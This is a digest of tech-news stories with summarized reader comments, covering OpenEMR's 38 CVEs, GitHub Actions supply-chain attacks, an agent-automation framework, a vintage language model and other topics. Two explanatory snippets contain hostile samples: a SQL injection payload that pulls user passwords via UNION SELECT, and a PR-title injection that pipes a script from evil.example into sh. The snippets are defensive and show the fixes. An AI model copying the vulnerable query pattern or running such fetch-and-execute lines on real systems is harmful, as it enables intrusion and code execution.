AISLE, an AI security firm, discovered 38 CVEs in OpenEMR — an open-source EHR platform used by over 100,000 providers and 200 million patients — during Q1 2026, surpassing the 23 vulnerabilities found in its most notable prior audit, conducted in 2018. The flaws fall into three categories: authorization failures including IDORs and missing ACL checks (24 CVEs), stored and reflected XSS (9 CVEs), and SQL injection plus path traversal (5 CVEs). Two SQL injection vulnerabilities scored CVSS 10.0: one in the Patient REST API's _sort parameter enabling UNION SELECT attacks, blind SLEEP() injection, and potential RCE via FILE privileges; another in the Immunization module's patient_id field with identical impact. A FHIR CareTeam endpoint exposed all patient records regardless of token scope due to a missing PHP interface declaration. OpenEMR maintainers fixed the bulk of issues in version 8.0.0 on February 11, 2026, with remaining patches landing through March. AISLE has since integrated its commit analyzer into OpenEMR's CI pipeline to catch vulnerabilities at code review before they reach production.
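
The _sort flaw is a textbook pattern, and a small sketch shows why. The code below is not OpenEMR's (it uses SQLite and invented table names); it illustrates how interpolating a caller-supplied sort field into the query string invites UNION SELECT and blind SLEEP()-style payloads, and why a column whitelist is the usual fix, since identifiers can't be bound as query parameters.

```python
# Illustration of the _sort-style injection class described above (not
# OpenEMR's actual code): splicing a caller-supplied sort field into the
# query string turns ORDER BY into a vehicle for UNION SELECT or blind
# time-delay payloads; whitelisting the column name closes the hole.
import sqlite3

ALLOWED_SORT_COLUMNS = {"last_name", "first_name", "dob"}

def list_patients_unsafe(conn: sqlite3.Connection, sort: str):
    # VULNERABLE: sort is attacker-controlled, e.g.
    #   "(SELECT 1 UNION SELECT password FROM users)"
    return conn.execute(f"SELECT id, last_name FROM patient ORDER BY {sort}")

def list_patients_safe(conn: sqlite3.Connection, sort: str):
    # Identifiers can't be passed as bound parameters, so validate against
    # a fixed whitelist before building the query.
    if sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"bad sort field: {sort!r}")
    return conn.execute(f"SELECT id, last_name FROM patient ORDER BY {sort}")
```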

Comments: Commenters broadly agree the findings are unsurprising, noting OpenEMR has been known for poor security for over 16 years with similar vulnerabilities published as far back as 2010. Several challenge the marketing framing, arguing SAST/DAST tools would yield comparable results. The "100,000 providers" claim is questioned — the sourced link traces to a now-404'd blog post from a defunct company — and users caution against equating OpenEMR's posture with enterprise EHRs like Epic. A former maintainer notes the codebase includes PHP 3-era code and should not be publicly exposed. The deeper concern is an AI-driven cybersecurity arms race: adversaries now have equal access to autonomous scanning, potentially enabling silent zero-day discovery at scale. Despite skepticism about the AI narrative, most agree AI-assisted auditing is genuinely valuable for catching common patterns like SQL injection and XSS before production. One commenter noted responsible disclosure details were buried at the article's end and should have been stated upfront.

Cua is an open-source Python framework (3.11+) for building AI agents that autonomously control computers — macOS, Linux, Windows, and Android — both locally via QEMU and in the cloud. Its headline feature is a background automation driver for native macOS apps that avoids stealing cursor focus or switching Spaces, even on non-Accessibility surfaces like Chromium web content and canvas-based tools such as Blender and Figma. The unified API exposes shell execution, screenshots, mouse clicks, keyboard input, and multi-touch gestures across all supported platforms. A companion CLI, cuabot, runs agents in sandboxed desktop windows with H.265 video, shared clipboard, and audio. The lume component manages macOS and Linux VMs on Apple Silicon using Apple's Virtualization.Framework for near-native performance. A benchmarking suite, cua-bench, supports evaluating agents on standard datasets like OSWorld and ScreenSpot with trajectory export for RL training. Every session records a replayable trajectory. Integration with Claude Code and Cursor is available via MCP server. The project is MIT licensed, though the optional ultralytics dependency via cua-agent[omni] carries AGPL-3.0 terms.

Comments: Commenters are broadly impressed, with one calling it among the coolest macOS hacks they've seen recently, noting that Apple's reluctance to expose agent-friendly APIs may push momentum toward agent-friendly Linux or Android alternatives. An ex-Apple engineer praised the technical implementation, drawing comparisons to a similar in-house tool they built for parallel native macOS UI automation testing, but criticized the default-on telemetry, arguing users should opt in rather than opt out. One user reported a positive prior experience with the lume VM component but ultimately chose to give agents direct supervised access to their own devices instead. A compliance-minded observer raised an audit trail gap: while agent actions produce logs of what was clicked or edited, the decision rationale behind each action isn't captured, making it difficult to explain agent behavior to compliance teams reviewing ERP interactions or file edits. A brief exchange also noted that the technical implementation had been publicly speculated about on HN roughly two weeks prior, with the speed of replication drawing favorable comment.

Supply chain attacks from Nov 2024 through April 2026 trace to GitHub Actions misconfigurations, not maintainer error. The pull_request_target trigger grants full secret access to fork-checkout jobs, enabling the spotbugs breach that cascaded through reviewdog to tj-actions, leaking secrets from 23,000 repos. Ultralytics was hit via cache poisoning through the same trigger, shipping a crypto miner to PyPI. The nx build system fell to template injection when a PR title ran shell code with an npm token in scope, briefly exposing thousands of private repos. Trivy was compromised twice: via pull_request_target, then via force-pushed version tags using harvested credentials. Elementary-data fell in ten minutes via an issue_comment trigger echoing unsanitized input to bash. Common factors: mutable action tags, default write GITHUB_TOKEN, unsafe ${{}} shell expansion, and cross-trust-boundary caches. GitHub's security roadmap adds SHA lockfiles, scoped secrets, and egress firewalls — all opt-in, leaving the long tail of public repos exposed. OIDC trusted publishing now chains registry integrity to GitHub Actions security. Zizmor and SHA pinning are the most actionable immediate defenses.
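
The ${{ }} expansion problem has the same shape as classic shell injection. The Python analogue below is not a workflow file (the real incidents involve YAML run: steps interpolating values such as a PR title); it shows how splicing untrusted text into a shell string lets it execute, and how passing it out-of-band as an argv element or environment variable, mirroring the recommended env: indirection in workflows, keeps it as data.

```python
# Analogue of the ${{ ... }} template-injection pattern described above:
# splicing untrusted text (a PR title, an issue comment) into a shell
# command lets that text break out and run its own commands; passing it
# as an argument or environment variable keeps it as data.
import subprocess

pr_title = 'Fix build"; curl https://evil.example/x.sh | sh; echo "'  # attacker-chosen

# VULNERABLE: same shape as `run: echo "${{ github.event.pull_request.title }}"`
subprocess.run(f'echo "{pr_title}"', shell=True)

# SAFER: hand the value over out-of-band instead of pasting it into the command.
subprocess.run(["echo", pr_title])                      # as an argv element
subprocess.run('echo "$PR_TITLE"', shell=True,
               env={"PR_TITLE": pr_title})              # or via the environment
```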

Comments: Users broadly endorse SHA pinning over mutable tags, with many feeling vindicated by recent incidents and urging immediate hash-pinning especially for third-party actions. Several developers criticize YAML as an inadequate CI environment, calling for a proper debuggable scripting language. Tools cited as mitigations include ratchet (automated SHA pinning), zizmor (static analysis), and hasp — a runtime sandbox using Rust, landlock, seccomp, and eBPF to enforce pinning and broker tokens without Docker. Dagger is mentioned as an alternative platform enabling local CI execution. Some users report migrating orchestration to Buildkite while retaining GitHub only for repository hosting. The pull_request_target trigger is characterized by some as having no legitimate use that outweighs its risk. Others note OIDC runner identities are configured once and rarely revisited during incidents. GitHub Actions performance degradation, partly attributed to wide Copilot review rollout, prompts some to consider returning to self-hosted Jenkins. The timing of a concurrent GitHub Actions outage is noted as ironic. Concerns about platform consolidation under Microsoft ownership surface as well.

Researchers introduce talkie-1930-13b, a 13B LM trained on 260B tokens of pre-1931 English text—books, newspapers, patents, journals, case law—to study generalization free from modern contamination. Vintage LMs enable testing whether models predict post-cutoff events, independently derive later discoveries like General Relativity, or learn Python from in-context examples without code in training data. The model underperforms a FineWeb-trained twin on benchmarks, largely due to OCR noise—conventional OCR yields 30% of human-transcribed performance, improving to 70% with regex cleaning. Post-training used historical texts (etiquette manuals, cookbooks, encyclopedias) for instruction pairs, then direct preference optimization with Claude as judge, raising instruction-following from 2.0 to 3.4 out of 5. Despite n-gram anachronism filtering, the model retains WWII and postwar knowledge, indicating incomplete leakage removal. The team plans GPT-3-scale training this summer, a trillion-token multilingual corpus, and a bespoke vintage OCR system. Alec Radford, key to the original GPT models, is among the authors.

Comments: Users find the model entertaining but unreliable: it opens sentences accurately then drifts into confident nonsense—crediting Edison with a 125 MPH car, mangling Ohm's law, misidentifying Ambrose Bierce's birthplace and Civil War allegiance. The pre-1931 definition of "computer" as a human occupation and the model's confidence no major European war looms in 1930 draw amusement. The Civil War exchange—where the model denies slavery as a cause—provokes dry commentary. Critics argue the post-training pipeline using Claude as judge undermined the contamination-free premise, and someone on X identified apparent post-cutoff data leaks. A key observation: the entire training corpus is public domain, making talkie unusually copyright-unencumbered. Users request Ollama support, period-accurate TTS, and mobile compatibility. The model's confident wrong predictions—universal peace by 2025, India still British in 2026—underscore the warning not to ask it questions you cannot verify. Some note its 1930s social views on gender and race reflect the era's dominant voices, raising questions about whose perspectives shaped the corpus.

C++26's std::define_static_array simplifies the "constexpr two-step" — a workaround needed because constexpr heap allocations can't persist to runtime, which rules out constinit std::vector globals. The two-step calls a constexpr function twice: once to get the size, then again to populate a std::array of that size. define_static_array instead emits a constexpr range as a span<const T> directly into the object file, which is cleaner and more compile-time-efficient. However, it has four limitations relative to the two-step: it requires structural types (excluding optional, string, span); it can't store pointers to string literals since those aren't valid template arguments; it can't work with move-only types since NTTPs must be copyable; and it only produces const rodata, making mutable static arrays impossible. Array objects from define_static_array are permitted but not required to be coalesced across different element types. Barry Revzin's P3380R1 could resolve the first three by expanding NTTP support to user-annotated types, though with arcane syntax. The author anticipates a future code-generation reflection facility to more fully supersede the two-step.

Comments: Users draw a sharp contrast with D, where immutable int[] aaa = f() compiles directly and lands in the object file's data section with no ceremony. The general reaction is that the complexity is "on-brand for C++," with readers left to decide whether that's a feature or flaw. The "compiler's imagination" metaphor earns praise as an unusually clear explanation, though one commenter notes it makes them want an AI harness around the compiler to reduce the cognitive overhead of experimenting with constexpr and std::execution. A question is raised about whether PMR (polymorphic memory resource) STL variants could offer a solution, with the compiler mapping ranges into a read-only section. Another seeks clarification on the underlying motivation — whether the goal is simply to bake data into compiled binaries so it's already resident in memory at runtime. The thread closes with pointed criticism that C++ practitioners excel at manufacturing problems and then devising elaborate solutions, questioning whether the effort is ultimately productive.

ASML (spun from Philips in 1984) monopolizes EUV lithography, the only process enabling sub-5nm chip production, with machines priced above $120M and a $400B+ market cap. EUV uses laser pulses on falling tin droplets to generate 13.5nm plasma light, reflected via ultra-precise mirrors to print 3nm-scale features onto silicon wafers. Modular outsourced design enabled fast repairs; US DOE EUV LLC membership and the 2001 acquisition of Silicon Valley Group cemented ASML's IP lead over Nikon and Canon. ASML defeated Nikon's 157nm dry approach via immersion lithography (water-bent 193nm light) and the TWINSCAN dual-stage architecture that eliminated idle machine time. In 2012, ASML sold 23% equity to Intel, TSMC, and Samsung, acquired light-source maker Cymer for $2.5B, and working as "one team" with TSMC achieved 500 wafers/day throughput, enabling commercial EUV by 2019. Decades of tacit knowledge embedded across 5,000+ suppliers — including optics firm Zeiss and laser maker Trumpf — makes replication nearly impossible; China's systematic hiring of former ASML engineers has not closed the gap.

Comments: Commenters argue ASML's edge reflects cumulative optimization across thousands of simultaneous steps rather than any single breakthrough — analogized to a high-performing quant fund whose advantage lies in operational refinement, not secret techniques. Several challenge the "world's most complex machine" claim, citing the Space Shuttle, LHC (Guinness record holder), ISS, and the power grid; one argues Zeiss — which grinds irreplaceable mirrors and cannot easily scale — is the true chokepoint. China's use of older DUV multi-patterning to work around export controls is flagged as significant. Silicon purity requirements have tightened to below 1 part per billion, and chip node names now diverge substantially from physical feature sizes. Recommended resources include Chris Miller's Chip War, the Veritasium EUV video, Asianometry's YouTube channel, and the Omega Tau podcast. Some view extreme machine complexity as evidence EUV is not yet mastered and predict future simplification, while others consider China eventually developing competing technology inevitable.

Dominik Behr built an SGI Indy (MIPS R4400) emulator in Rust with heavy AI assistance from Claude and Gemini, framing it as an experiment in "vibe coding." The emulator boots both IRIX 6.5 and 5.3 to multiuser mode with working networking (ping, telnet, ftp), X11/Newport REX3 graphics, and mouse/keyboard input via PS/2 emulation. A three-tier Cranelift-based JIT compiler translates MIPS basic blocks to native x86_64, progressing from ALU-only through loads to full store support based on execution frequency, with hot block profiles persisting across sessions. A separate REX3 graphics JIT compiles specialized per-DrawMode "shaders" for the draw pipeline in the background. Copy-on-write disk overlay protects the base image from corruption during development. Known limitations include failures with old Gentoo MIPS liveCDs and NetBSD hanging on a white screen. The project requires a raw IRIX 6.5.22 disk image (convertible from the MAME IRIX image) and optionally an Indy PROM binary. A rules/ directory documents hard-won JIT and IRIX debugging lessons intended for both humans and AI assistants. The project is BSD 3-Clause licensed and accepts bug reports and merge requests.

Comments: Comments are sparse: one user flags that the project was already posted to Hacker News 26 days prior, questioning its eligibility as a fresh Show HN submission. Another user expresses curiosity about the output of IRIX's hardware inventory command (hinv), noting they want to dig out their old IRIX CDs to compare. A third simply calls it "very cool." There is no substantive technical discussion in the comments.

GitHub Copilot code reviews will begin consuming GitHub Actions minutes on private repositories starting June 1, 2026, while public repos remain unaffected. The change stems from Copilot's agentic tool-calling architecture running on GitHub-hosted runners, triggering dual billing: Actions minutes drawn from existing plan entitlements plus AI Credits under a new usage-based model. This affects Copilot Pro, Pro+, Business, and Enterprise plans, including reviews from non-licensed users billed via direct org billing. Until June 1, reviews draw only from premium request unit (PRU) allowances and no Actions minutes are charged. GitHub recommends billing managers review current Actions usage, confirm budget and spending limits, and monitor consumption via Copilot metrics, Actions metrics, and Billing Usage Reports. No additional runner setup is required if GitHub-hosted runners are already enabled, and self-hosted runners remain an option. Organizations can set budgets to cap Actions spending beyond included plan entitlements.

Comments: Commenters view this as part of an industry-wide shift away from VC-subsidized AI pricing toward cost recovery, predicting competitors will follow once volume peaks. Several argue Copilot has long been the weakest mainstream AI coding tool — inferior to Cursor, Windsurf, and Claude Code — making the price hike self-defeating; one compares it to "the Windows Phone of AI coding assistants." The dual billing of AI Credits and Actions minutes is criticized as confusing obfuscation that makes actual costs hard to trace, and users question why non-Actions activity should consume Actions budgets at all. The agentic model reportedly doubled review turnaround time, and the absence of per-review minute data is flagged as a problem for teams running 20+ PRs daily. Some are migrating off GitHub but find no strong alternative, citing GitLab, Codeberg, Sourcehut, and Bitbucket as each lacking. Others recommend local models as cheaper, and CI/CD minute exhaustion is raised as a related pain point for solo developers.